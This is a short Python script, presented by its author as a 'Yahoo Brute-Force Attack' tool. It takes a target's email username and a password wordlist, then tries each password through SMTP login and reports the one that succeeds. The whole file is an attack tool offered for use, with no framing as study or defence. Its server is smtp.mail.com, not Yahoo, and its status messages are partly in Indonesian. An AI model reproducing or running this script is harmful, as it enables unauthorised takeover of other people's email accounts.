#!/usr/bin/python


import smtplib
import os

os.system("clear")

smtpserver = smtplib.SMTP("smtp.mail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
import os
os.system('clear')
os.system("figlet -f pagga '      Yahoo     ' | lolcat")
os.system("figlet -f pagga ' Brute-Force ' | lolcat")
os.system("figlet -f pagga '      Attack      ' | lolcat")
print('''
	==================================
	|      [Yahoo] ==> 3            |
	|--------------------------------|
	| Instagram @shubham_g0sain      |
	| CoDeD By ShuBhamg0sain         |
	|--------------------------------|

	''')

print "[!] Yahoo Brute Force [!]"

user = raw_input("\ntarget Yahoo ussername : ")
passwfile = raw_input("\nWordlist : ")
passwfile = open(passwfile, "r")

for password in passwfile:
		try:
				smtpserver.login(user, password)
		
				print "\n[!] Password Found : %s" % password
				break
		
		except smtplib.SMTPAuthenticationError:
				print "\n[!] Mencoba Password : %s" % password

















